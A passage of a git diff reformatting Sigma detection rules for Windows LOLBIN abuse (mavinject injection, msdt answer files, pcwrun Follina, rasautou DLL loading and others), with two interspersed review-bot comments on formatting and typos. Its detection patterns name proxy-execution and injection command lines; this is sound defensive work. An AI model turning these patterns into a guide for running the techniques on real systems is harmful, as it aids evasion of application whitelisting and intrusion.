+ - ViberPC updater calls this binary with the following commandline "ie4uinit.exe -ClearIconCache"
 level: medium
 ruletype: Sigma
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_ilasm.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_ilasm.yml
index bbaf8ed19..8cf3b21e1 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_ilasm.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_ilasm.yml
@@ -19,8 +19,8 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- - NewProcessName|endswith: \ilasm.exe
- - OriginalFileName: ilasm.exe
+ - NewProcessName|endswith: \ilasm.exe
+ - OriginalFileName: ilasm.exe
 condition: process_creation and selection
 falsepositives:
 - Unknown
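Review bot: `CurrentDirectory:` with an empty value in the ie4uinit `filter_missing` block parses to the same null as the removed `CurrentDirectory: null`, but the bare key reads like an unfinished entry rather than the deliberate "field is absent" test that `condition: ... not 1 of filter_*` depends on. Unless the rule loader treats the two spellings differently (not determinable from this diff), keep the explicit form, `CurrentDirectory: null`, so the intent survives the next reformat. Separately, `filter_correct` uses lower-case `c:\windows\...` while the other rules in this commit write `C:\Windows\...`; harmless if matching is case-insensitive, but worth aligning for consistency.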
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_jsc.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_jsc.yml
index 13652dcce..96b48d455 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_jsc.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_jsc.yml
@@ -1,8 +1,7 @@
 title: JSC Convert Javascript To Executable
 id: 52788a70-f1da-40dd-8fbd-73b5865d6568
 status: test
-description: Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript
- code to .exe or .dll format
+description: Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript code to .exe or .dll format
 references:
 - https://lolbas-project.github.io/lolbas/Binaries/Jsc/
 author: frack113
@@ -18,8 +17,8 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|contains: .js
- NewProcessName|endswith: \jsc.exe
+ CommandLine|contains: .js
+ NewProcessName|endswith: \jsc.exe
 condition: process_creation and selection
 falsepositives:
 - Unknown
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_kavremover.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_kavremover.yml
index 3c4bd30e8..8e971ce8c 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_kavremover.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_kavremover.yml
@@ -1,9 +1,7 @@
 title: Kavremover Dropped Binary LOLBIN Usage
 id: d047726b-c71c-4048-a99b-2e2f50dc107d
 status: test
-description: Detects the execution of a signed binary dropped by Kaspersky Lab Products
- Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands
- and binaries.
+description: Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.
 references:
 - https://nasbench.medium.com/lolbined-using-kaspersky-endpoint-security-kes-installer-to-execute-arbitrary-commands-1c999f1b7fea
 author: Nasreddine Bencherchali (Nextron Systems)
@@ -19,11 +17,11 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|contains: ' run run-cmd '
+ CommandLine|contains: ' run run-cmd '
 filter:
 ParentProcessName|endswith:
- - \kavremover.exe
- - \cleanapi.exe
+ - \kavremover.exe # When launched from kavremover.exe
+ - \cleanapi.exe # When launched from KES installer
 condition: process_creation and (selection and not filter)
 falsepositives:
 - Unknown
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml
index fa7b697ba..2ed4fa8b6 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml
@@ -1,8 +1,7 @@
 title: Launch-VsDevShell.PS1 Proxy Execution
 id: 45d3a03d-f441-458c-8883-df101a3bb146
 status: test
-description: Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script
- to execute commands.
+description: Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.
 references:
 - https://twitter.com/nas_bench/status/1535981653239255040
 author: Nasreddine Bencherchali (Nextron Systems)
@@ -18,9 +17,9 @@ detection:
 EventID: 4688
 Channel: Security
 selection_script:
- CommandLine|contains: Launch-VsDevShell.ps1
+ CommandLine|contains: Launch-VsDevShell.ps1
 selection_flags:
- CommandLine|contains:
+ CommandLine|contains:
 - 'VsWherePath '
 - 'VsInstallationPath '
 condition: process_creation and (all of selection_*)
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_manage_bde.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_manage_bde.yml
index 106f04be9..a3292fba8 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_manage_bde.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_manage_bde.yml
@@ -1,8 +1,7 @@
 title: Potential Manage-bde.wsf Abuse To Proxy Execution
 id: c363385c-f75d-4753-a108-c1a8e28bdbda
 status: test
-description: Detects potential abuse of the "manage-bde.wsf" script as a LOLBIN to
- proxy execution
+description: Detects potential abuse of the "manage-bde.wsf" script as a LOLBIN to proxy execution
 references:
 - https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/
 - https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712
@@ -23,19 +22,18 @@ detection:
 EventID: 4688
 Channel: Security
 selection_wscript_img:
- - NewProcessName|endswith: \wscript.exe
- - OriginalFileName: wscript.exe
+ - NewProcessName|endswith: \wscript.exe
+ - OriginalFileName: wscript.exe
 selection_wscript_cli:
- CommandLine|contains: manage-bde.wsf
+ CommandLine|contains: manage-bde.wsf
 selection_parent:
 ParentCommandLine|contains: manage-bde.wsf
 ParentProcessName|endswith:
 - \cscript.exe
 - \wscript.exe
 selection_filter_cmd:
- NewProcessName|endswith: \cmd.exe
- condition: process_creation and (all of selection_wscript_* or (selection_parent
- and not selection_filter_cmd))
+ NewProcessName|endswith: \cmd.exe
+ condition: process_creation and (all of selection_wscript_* or (selection_parent and not selection_filter_cmd))
 falsepositives:
 - Unlikely
 level: high
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml
index 58a14f39e..6b865df7f 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml
@@ -1,18 +1,17 @@
 title: Mavinject Inject DLL Into Running Process
 id: 4f73421b-5a0b-4bbf-a892-5a7fb99bea66
 related:
- - id: 17eb8e57-9983-420d-ad8a-2c4976c22eb8
- type: obsoletes
+ - id: 17eb8e57-9983-420d-ad8a-2c4976c22eb8
+ type: obsoletes
 status: test
-description: Detects process injection using the signed Windows tool "Mavinject" via
- the "INJECTRUNNING" flag
+description: Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md
 - https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e
 - https://twitter.com/gN3mes1s/status/941315826107510784
 - https://reaqta.com/2017/12/mavinject-microsoft-injector/
- - https://twitter.com/Hexacorn/status/776122138063409152
+ - https://twitter.com/Hexacorn/status/776122138063409152 # Deleted tweet
 - https://github.com/SigmaHQ/sigma/issues/3742
 - https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection
 author: frack113, Florian Roth
@@ -31,7 +30,7 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|contains: ' /INJECTRUNNING '
+ CommandLine|contains: ' /INJECTRUNNING '
 filter:
 ParentProcessName: C:\Windows\System32\AppVClient.exe
 condition: process_creation and (selection and not filter)
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_mpiexec.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_mpiexec.yml
index 352150645..19dd710aa 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_mpiexec.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_mpiexec.yml
@@ -1,8 +1,7 @@
 title: MpiExec Lolbin
 id: 729ce0ea-5d8f-4769-9762-e35de441586d
 status: test
-description: Detects a certain command line flag combination used by mpiexec.exe LOLBIN
- from HPC pack that can be used to execute any other binary
+description: Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary
 references:
 - https://twitter.com/mrd0x/status/1465058133303246867
 - https://docs.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps
@@ -21,11 +20,11 @@ detection:
 EventID: 4688
 Channel: Security
 selection_binary:
- - NewProcessName|endswith: \mpiexec.exe
- - Imphash: d8b52ef6aaa3a81501bdfff9dbb96217
- - Hashes|contains: IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217
+ - NewProcessName|endswith: \mpiexec.exe
+ - Imphash: d8b52ef6aaa3a81501bdfff9dbb96217
+ - Hashes|contains: IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217
 selection_flags:
- CommandLine|contains:
+ CommandLine|contains:
 - ' /n 1 '
 - ' -n 1 '
 condition: process_creation and (all of selection*)
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_msdeploy.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_msdeploy.yml
index 43d4b1c7b..4d3583a1d 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_msdeploy.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_msdeploy.yml
@@ -20,11 +20,11 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - verb:sync
 - -source:RunCommand
 - -dest:runCommand
- NewProcessName|endswith: \msdeploy.exe
+ NewProcessName|endswith: \msdeploy.exe
 condition: process_creation and selection
 fields:
 - SubjectUserName
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml
index fddda24bd..39daa37fd 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml
@@ -1,9 +1,7 @@
 title: Execute MSDT Via Answer File
 id: 9c8c7000-3065-44a8-a555-79bcba5d9955
 status: test
-description: Detects execution of "msdt.exe" using an answer file which is simulating
- the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility
- tab)
+description: Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab)
 references:
 - https://lolbas-project.github.io/lolbas/Binaries/Msdt/
 author: Nasreddine Bencherchali (Nextron Systems)
@@ -20,10 +18,10 @@ detection:
 EventID: 4688
 Channel: Security
 selection_cli:
- CommandLine|contains: \WINDOWS\diagnostics\index\PCWDiagnostic.xml
- NewProcessName|endswith: \msdt.exe
+ CommandLine|contains: \WINDOWS\diagnostics\index\PCWDiagnostic.xml
+ NewProcessName|endswith: \msdt.exe
 selection_answer:
- CommandLine|contains:
+ CommandLine|contains:
 - ' -af '
 - ' /af '
 filter:
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_openconsole.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_openconsole.yml
index 0c22c631b..fb9b6d377 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_openconsole.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_openconsole.yml
@@ -1,8 +1,7 @@
 title: Use of OpenConsole
 id: 814c95cc-8192-4378-a70a-f1aafd877af1
 status: test
-description: Detects usage of OpenConsole binary as a LOLBIN to launch other binaries
- to bypass application Whitelisting
+description: Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting
 references:
 - https://twitter.com/nas_bench/status/1537563834478645252
 author: Nasreddine Bencherchali (Nextron Systems)
@@ -18,10 +17,10 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- - OriginalFileName: OpenConsole.exe
- - NewProcessName|endswith: \OpenConsole.exe
+ - OriginalFileName: OpenConsole.exe
+ - NewProcessName|endswith: \OpenConsole.exe
 filter:
- NewProcessName|startswith: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal
+ NewProcessName|startswith: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal
 condition: process_creation and (selection and not filter)
 falsepositives:
 - Legitimate use by an administrator
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_openwith.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_openwith.yml
index 3711e1b52..71592d1c5 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_openwith.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_openwith.yml
@@ -19,8 +19,8 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|contains: /c
- NewProcessName|endswith: \OpenWith.exe
+ CommandLine|contains: /c
+ NewProcessName|endswith: \OpenWith.exe
 condition: process_creation and selection
 falsepositives:
 - Unknown
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_pcalua.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_pcalua.yml
index f50aa149b..e70e24e4d 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_pcalua.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_pcalua.yml
@@ -1,17 +1,14 @@
 title: Use of Pcalua For Execution
 id: 0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2
 related:
- - id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02
- type: obsoletes
+ - id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02
+ type: obsoletes
 status: test
-description: Detects execition of commands and binaries from the context of The program
- compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to
- bypass application whitelisting.
+description: Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.
 references:
 - https://lolbas-project.github.io/lolbas/Binaries/Pcalua/
 - https://pentestlab.blog/2020/07/06/indirect-command-execution/
-author: Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic
- Blue Detections, Endgame), oscd.community
+author: Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
 date: 2022/06/14
 modified: 2023/01/04
 tags:
@@ -25,8 +22,8 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|contains: ' -a'
- NewProcessName|endswith: \pcalua.exe
+ CommandLine|contains: ' -a' # No space after the flag because it accepts anything as long as there a "-a"
+ NewProcessName|endswith: \pcalua.exe
 condition: process_creation and selection
 falsepositives:
 - Legitimate use by a via a batch script or by an administrator.
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_pcwrun.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_pcwrun.yml
index b9c982ab3..9f3575721 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_pcwrun.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_pcwrun.yml
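Review bot: The reflowed description line in the first pcalua hunk still reads `Detects execition of commands and binaries`; since the line is being rewritten anyway it should become `Detects execution of commands and binaries`. In the second hunk the new inline comment on the `CommandLine|contains: ' -a'` line ends with `as long as there a "-a"`, which should read `as long as there is a "-a"`. Both hunks of this file end on this line.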
@@ -1,8 +1,7 @@
 title: Indirect Command Execution By Program Compatibility Wizard
 id: b97cd4b1-30b8-4a9d-bd72-6293928d52bc
 status: test
-description: Detect indirect command execution via Program Compatibility Assistant
- pcwrun.exe
+description: Detect indirect command execution via Program Compatibility Assistant pcwrun.exe
 references:
 - https://twitter.com/pabraeken/status/991335019833708544
 - https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/
@@ -29,8 +28,7 @@ fields:
 - ParentCommandLine
 - CommandLine
 falsepositives:
- - Need to use extra processing with 'unique_count' / 'filter' to focus on outliers
- as opposed to commonly seen artifacts
+ - Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts
 - Legit usage of scripts
 level: low
 ruletype: Sigma
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml
index e70543d1c..8b5dba6d0 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml
@@ -1,8 +1,7 @@
 title: Execute Pcwrun.EXE To Leverage Follina
 id: 6004abd0-afa4-4557-ba90-49d172e0a299
 status: test
-description: Detects indirect command execution via Program Compatibility Assistant
- "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability
+description: Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability
 references:
 - https://twitter.com/nas_bench/status/1535663791362519040
 author: Nasreddine Bencherchali (Nextron Systems)
@@ -19,8 +18,8 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|contains: ../
- NewProcessName|endswith: \pcwrun.exe
+ CommandLine|contains: ../
+ NewProcessName|endswith: \pcwrun.exe
 condition: process_creation and selection
 falsepositives:
 - Unlikely
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_pcwutl.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_pcwutl.yml
index 3cb371d8c..04eba32d8 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_pcwutl.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_pcwutl.yml
@@ -1,8 +1,7 @@
 title: Code Execution via Pcwutl.dll
 id: 9386d78a-7207-4048-9c9f-a93a7c2d1c05
 status: test
-description: Detects launch of executable by calling the LaunchApplication function
- from pcwutl.dll library.
+description: Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.
 references:
 - https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/
 - https://twitter.com/harr0ey/status/989617817849876488
@@ -20,10 +19,10 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith: \rundll32.exe
- - OriginalFileName: RUNDLL32.EXE
+ - NewProcessName|endswith: \rundll32.exe
+ - OriginalFileName: RUNDLL32.EXE
 selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - pcwutl
 - LaunchApplication
 condition: process_creation and (all of selection_*)
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_pester.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_pester.yml
index 0f5d7a88e..bcafbd54c 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_pester.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_pester.yml
@@ -1,11 +1,10 @@
 title: Execute Code with Pester.bat as Parent
 id: 18988e1b-9087-4f8a-82fe-0414dce49878
 related:
- - id: 59e938ff-0d6d-4dc3-b13f-36cc28734d4e
- type: similar
+ - id: 59e938ff-0d6d-4dc3-b13f-36cc28734d4e
+ type: similar
 status: test
-description: Detects code execution via Pester.bat (Pester - Powershell Modulte for
- testing)
+description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)
 references:
 - https://twitter.com/Oddvarmoe/status/993383596244258816
 - https://twitter.com/_st0pp3r_/status/1560072680887525378
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_pester_1.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_pester_1.yml
index 7a493b481..0afae5a93 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_pester_1.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_pester_1.yml
@@ -1,8 +1,7 @@
 title: Execute Code with Pester.bat
 id: 59e938ff-0d6d-4dc3-b13f-36cc28734d4e
 status: test
-description: Detects code execution via Pester.bat (Pester - Powershell Modulte for
- testing)
+description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)
 references:
 - https://twitter.com/Oddvarmoe/status/993383596244258816
 - https://github.com/api0cradle/LOLBAS/blob/d148d278f5f205ce67cfaf49afdfb68071c7252a/OSScripts/pester.md
@@ -22,19 +21,19 @@ detection:
 EventID: 4688
 Channel: Security
 powershell_module:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - Pester
 - Get-Help
- NewProcessName|endswith:
+ NewProcessName|endswith:
 - \powershell.exe
 - \pwsh.exe
 cmd_execution:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - pester
 - ;
- NewProcessName|endswith: \cmd.exe
+ NewProcessName|endswith: \cmd.exe
 get_help:
- CommandLine|contains:
+ CommandLine|contains:
 - help
 - \?
 condition: process_creation and (powershell_module or (cmd_execution and get_help))
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_printbrm.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_printbrm.yml
index 911e77471..1927f1dd8 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_printbrm.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_printbrm.yml
@@ -1,8 +1,7 @@
 title: PrintBrm ZIP Creation of Extraction
 id: cafeeba3-01da-4ab4-b6c4-a31b1d9730c7
 status: test
-description: Detects the execution of the LOLBIN PrintBrm.exe, which can be used to
- create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.
+description: Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.
 references:
 - https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/
 author: frack113
@@ -20,10 +19,10 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - ' -f'
 - .zip
- NewProcessName|endswith: \PrintBrm.exe
+ NewProcessName|endswith: \PrintBrm.exe
 condition: process_creation and selection
 falsepositives:
 - Unknown
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_pubprn.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_pubprn.yml
index 09307cc8f..80e03c4a0 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_pubprn.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_pubprn.yml
@@ -1,8 +1,7 @@
 title: Pubprn.vbs Proxy Execution
 id: 1fb76ab8-fa60-4b01-bddd-71e89bf555da
 status: test
-description: Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute
- commands.
+description: Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.
 references:
 - https://lolbas-project.github.io/lolbas/Scripts/Pubprn/
 author: frack113
@@ -18,7 +17,7 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - \pubprn.vbs
 - 'script:'
 condition: process_creation and selection
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml
index cf56a4a60..7a0309f9a 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml
@@ -1,8 +1,7 @@
 title: DLL Execution via Rasautou.exe
 id: cd3d1298-eb3b-476c-ac67-12847de55813
 status: test
-description: Detects using Rasautou.exe for loading arbitrary .DLL specified in -d
- option and executes the export specified in -p.
+description: Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.
 references:
 - https://lolbas-project.github.io/lolbas/Binaries/Rasautou/
 - https://github.com/fireeye/DueDLLigence
@@ -15,19 +14,16 @@ tags:
 logsource:
 product: windows
 category: process_creation
- definition: Since options '-d' and '-p' were removed in Windows 10 this rule is
- relevant only for Windows before 10. And as Windows 7 doesn't log command
- line in 4688 by default, to detect this attack you need Sysmon 1 configured
- or KB3004375 installed for command-line auditing (https://support.microsoft.com/en-au/help/3004375/microsoft-security-advisory-update-to-improve-windows-command-line-aud)
+ definition: Since options '-d' and '-p' were removed in Windows 10 this rule is relevant only for Windows before 10. And as Windows 7 doesn't log command line in 4688 by default, to detect this attack you need Sysmon 1 configured or KB3004375 installed for command-line auditing (https://support.microsoft.com/en-au/help/3004375/microsoft-security-advisory-update-to-improve-windows-command-line-aud)
 detection:
 process_creation:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith: \rasautou.exe
- - OriginalFileName: rasdlui.exe
+ - NewProcessName|endswith: \rasautou.exe
+ - OriginalFileName: rasdlui.exe
 selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - ' -d '
 - ' -p '
 condition: process_creation and (all of selection*)
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_register_app.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_register_app.yml
index 495d1c1a7..d222c45d8 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_register_app.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_register_app.yml
@@ -1,8 +1,7 @@
 title: REGISTER_APP.VBS Proxy Execution
 id: 1c8774a0-44d4-4db0-91f8-e792359c70bd
 status: test
-description: Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register
- a VSS/VDS Provider as a COM+ application.
+description: Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.
 references:
 - https://twitter.com/sblmsrsn/status/1456613494783160325?s=20
 author: Nasreddine Bencherchali (Nextron Systems)
@@ -18,12 +17,11 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - \register_app.vbs
 - -register
 condition: process_creation and selection
 falsepositives:
- - Legitimate usage of the script. Always investigate what's being registered to
- confirm if it's benign
+ - Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign
 level: medium
 ruletype: Sigma
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_remote.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_remote.yml
index d26ac534b..43615d65a 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_remote.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_remote.yml
@@ -1,8 +1,7 @@
 title: Use of Remote.exe
 id: 4eddc365-79b4-43ff-a9d7-99422dc34b93
 status: test
-description: Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL
- bypass and running remote files.
+description: Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.
 references:
 - https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/
 - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/
@@ -19,8 +18,8 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- - NewProcessName|endswith: \remote.exe
- - OriginalFileName: remote.exe
+ - NewProcessName|endswith: \remote.exe
+ - OriginalFileName: remote.exe
 condition: process_creation and selection
 falsepositives:
 - Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg).
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_replace.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_replace.yml
index 148d1f4ac..1cd032a7b 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_replace.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_replace.yml
@@ -1,8 +1,7 @@
 title: Replace.exe Usage
 id: 9292293b-8496-4715-9db6-37028dcda4b3
 status: test
-description: Detects the use of Replace.exe which can be used to replace file with
- another file
+description: Detects the use of Replace.exe which can be used to replace file with another file
 references:
 - https://lolbas-project.github.io/lolbas/Binaries/Replace/
 - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/replace
@@ -20,9 +19,9 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- NewProcessName|endswith: \replace.exe
+ NewProcessName|endswith: \replace.exe
 argument:
- CommandLine|contains:
+ CommandLine|contains:
 - /a
 - -a
 condition: process_creation and (selection and argument)
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_runexehelper.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_runexehelper.yml
index 45adc3cd3..96b6ff9e9 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_runexehelper.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_runexehelper.yml
@@ -1,8 +1,7 @@
 title: Lolbin Runexehelper Use As Proxy
 id: cd71385d-fd9b-4691-9b98-2b1f7e508714
 status: test
-description: Detect usage of the "runexehelper.exe" binary as a proxy to launch other
- programs
+description: Detect usage of the "runexehelper.exe" binary as a proxy to launch other programs
 references:
 - https://twitter.com/0gtweet/status/1206692239839289344
 - https://lolbas-project.github.io/lolbas/Binaries/Runexehelper/
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_runscripthelper.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_runscripthelper.yml
index 2730b5264..5f20e9aff 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_runscripthelper.yml
